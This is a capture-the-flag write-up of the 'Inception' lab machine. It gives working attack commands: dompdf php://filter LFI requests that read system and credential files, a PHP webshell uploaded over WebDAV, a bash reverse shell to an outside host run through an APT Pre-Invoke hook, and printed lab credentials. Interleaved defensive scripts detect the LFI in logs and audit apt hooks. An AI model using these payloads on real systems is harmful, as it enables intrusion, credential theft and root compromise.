[Meachines] [Medium] Inception DOM-PDF LFI + davtest + Squid Unauthorized Access + Apt Pre-Invoke Privilege Escalation

2025-04-02

Information Gathering

IP Address     Open Ports
10.10.10.67    TCP:80,3128

$ ip='10.10.10.67'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Inception
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved

DOM-PDF LFI

http://10.10.10.67/

http://10.10.10.67:3128/

$ feroxbuster -u 'http://10.10.10.67/'

http://10.10.10.67/dompdf/README.md

http://10.10.10.67/dompdf/VERSION

https://www.exploit-db.com/exploits/33004

$ curl 'http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd'

$ curl -s 'http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/apache2/sites-enabled/000-default.conf' |grep -oE '[A-Za-z0-9+/=]{20,}' | tr -d '\n' | base64 -d

$ curl -s 'http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/var/www/html/webdav_test_inception/webdav.passwd' |grep -oE '[A-Za-z0-9+/=]{20,}' | tr -d '\n' | base64 -d

username:webdav_tester
password:babygurl69
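
On the defending side, the `input_file` reads above leave a clear trace in the web server log. The following is an added example, not part of the original write-up: it assumes Apache combined-format access logs, the function names are hypothetical, and the log lines are constructed. It flags dompdf requests whose `input_file` is a stream wrapper, an absolute path or a traversal, including percent-encoded spellings.

```sh
#!/bin/sh
# Added example: find dompdf requests whose input_file parameter is a stream
# wrapper, an absolute path or a traversal, in Apache combined-format logs.

find_dompdf_lfi() {
    awk -F'"' '
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    # Decode %XX escapes so encoded spellings of "php://" are caught as well.
    function urldecode(s,    out, i, c) {
        out = ""
        for (i = 1; i <= length(s); i++) {
            c = substr(s, i, 1)
            if (c == "%" && substr(s, i + 1, 2) ~ /^[0-9A-Fa-f][0-9A-Fa-f]$/) {
                out = out sprintf("%c", hexval(substr(s, i + 1, 1)) * 16 + hexval(substr(s, i + 2, 1)))
                i += 2
            } else out = out c
        }
        return out
    }
    {
        split($1, pre, " "); split($2, req, " ")      # $2 is: METHOD URI PROTOCOL
        q = index(req[2], "?")
        if (q == 0 || substr(req[2], 1, q - 1) !~ /dompdf\.php$/) next
        n = split(substr(req[2], q + 1), params, "&")
        for (i = 1; i <= n; i++) {
            if (index(params[i], "input_file=") != 1) continue
            v = urldecode(substr(params[i], 12))
            lv = tolower(v)
            if (lv ~ /^[a-z][a-z0-9.+-]*:/ || lv ~ /^\// || lv ~ /\.\.\//)
                printf "%s\t%s\n", pre[1], v          # client IP, decoded value
        }
    }' "$1"
}

# Constructed sample log lines (documentation addresses, not real traffic).
sample_access_log() {
    cat <<'EOF'
203.0.113.5 - - [02/Apr/2025:10:00:01 +0000] "GET /dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 3021 "-" "curl/8.5.0"
203.0.113.5 - - [02/Apr/2025:10:00:09 +0000] "GET /dompdf/dompdf.php?input_file=%70hp%3A%2F%2Ffilter/resource=/etc/apache2/sites-enabled/000-default.conf HTTP/1.1" 200 4100 "-" "curl/8.5.0"
198.51.100.7 - - [02/Apr/2025:10:01:00 +0000] "GET /dompdf/dompdf.php?input_file=invoice.html HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Apr/2025:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
EOF
}

tmp="$(mktemp)"; sample_access_log > "$tmp"; find_dompdf_lfi "$tmp"; rm -f "$tmp"
```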

davtest && Webshell

Web Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to let people create and modify websites over HTTP. It originated in 1996.

$ davtest -url http://10.10.10.67/webdav_test_inception -auth webdav_tester:babygurl69

$ echo '<?php system($_GET[cmd]); ?>' > rev.php

$ curl -X PUT http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/rev.php -d @rev.php

#!/bin/bash

URL='http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/rev.php?cmd='

while true; do
    read -p "webdav-shell> " cmd
    if [[ "$cmd" == "exit" ]]; then
        echo "[+] Exiting shell..."
        break
    fi
    encoded_cmd=$(echo -n "$cmd" | jq -sRr @uri)
    curl -s "${URL}${encoded_cmd}"
    echo
done

www-data -> cobb : Squid Unauthorized access

webdav-shell> cat /var/www/html/wordpress_4.8.3/wp-config.php

username:root
password:VwPddNh7xMZyDQoByQL4

$ proxychains -f ./proxychains.conf ssh cobb@127.0.0.1

User.txt

a5b6db2fa5bfe8a677c41ec3b01b2ba6

Privilege Escalation: FTP + TFTP && Apt Pre-Invoke Script

$ sudo su

$ proxychains -f ./proxychains.conf ssh -D 1080 cobb@127.0.0.1

$ proxychains -f ./proxychains1080.conf scp pspy64 cobb@127.0.0.1:/tmp/pspy64

$ proxychains -f ./proxychains1080.conf scp linpeas.sh cobb@127.0.0.1:/tmp/linpeas.sh

Scan the class C segment

$ nc -uzv 192.168.0.1 1-65535 2>&1 | grep -v refused

Connection to 192.168.0.1 21 port [tcp/ftp] succeeded!
Connection to 192.168.0.1 22 port [tcp/ssh] succeeded!
Connection to 192.168.0.1 53 port [tcp/domain] succeeded!

$ ftp 192.168.0.1

Files cannot be uploaded over FTP. Reading the host's cron jobs shows that the apt update command runs every five minutes.

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 *   * * *   root    apt update 2>&1 >/var/log/apt/custom.log
30 23   * * *   root    apt upgrade -y 2>&1 >/dev/null

$ tftp 192.168.0.1

tftp> put /tmp/exp /tmp/exp

Files can be uploaded over TFTP.

Target host:

Contents of 00exp

APT::Update::Pre-Invoke {"/bin/bash /tmp/rev.sh"}

/tmp/rev.sh

#!/bin/bash

bash -i >& /dev/tcp/192.168.0.10/9911 0>&1

$ tftp 192.168.0.1

tftp> put /tmp/00exp /etc/apt/apt.conf.d/00exp
tftp> put /tmp/rev.sh /tmp/rev.sh

$ nc -lvnp 9911

Target container:

$ nc -lvnp 9911

root.txt

d208effa777aa4489c26d2772723190c
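
The escalation works because any file written into /etc/apt/apt.conf.d is parsed by the root-run `apt update` cron job. The following is an added example, not part of the original write-up: it audits an apt.conf.d directory for `*-Invoke` hooks and flags commands that execute from world-writable locations. The function names are hypothetical and the sample directory is constructed, reusing the 00exp drop-in shown above beside a benign hook.

```sh
#!/bin/sh
# Added example: list every APT/dpkg *-Invoke hook under an apt.conf.d
# directory and flag commands that run from world-writable locations.

audit_apt_hooks() {
    dir="${1:-/etc/apt/apt.conf.d}"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        awk -v file="$f" '
        /^[ \t]*(\/\/|#)/ { next }                      # skip comment lines
        match($0, /[A-Za-z:]*(Pre|Post)-Invoke[A-Za-z-]*/) {
            hook = substr($0, RSTART, RLENGTH); inhook = 1
        }
        inhook {
            rest = $0
            # every double-quoted string inside the hook block is a command
            while (match(rest, /"[^"]*"/)) {
                cmd = substr(rest, RSTART + 1, RLENGTH - 2)
                flag = (cmd ~ /(^|[ \t=])\/(tmp|var\/tmp|dev\/shm)\//) ? "WRITABLE-PATH" : "review"
                printf "%s\t%s\t%s\t%s\n", flag, file, hook, cmd
                rest = substr(rest, RSTART + RLENGTH)
            }
            if ($0 ~ /}/) inhook = 0                    # hook block closed
        }' "$f"
    done
}

# Constructed sample directory: the drop-in from this page plus a benign hook.
make_sample_conf_dir() {
    d="$(mktemp -d)"
    printf '%s\n' 'APT::Update::Pre-Invoke {"/bin/bash /tmp/rev.sh"}' > "$d/00exp"
    printf '%s\n' '// constructed benign hook' \
        'APT::Update::Post-Invoke-Success {"touch /var/lib/apt/periodic/update-success-stamp 2>/dev/null || true";};' > "$d/15update-stamp"
    echo "$d"
}

demo="$(make_sample_conf_dir)"; audit_apt_hooks "$demo"; rm -rf "$demo"
```

Run `audit_apt_hooks` with no argument to check /etc/apt/apt.conf.d on a live host; every WRITABLE-PATH row needs an explanation.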

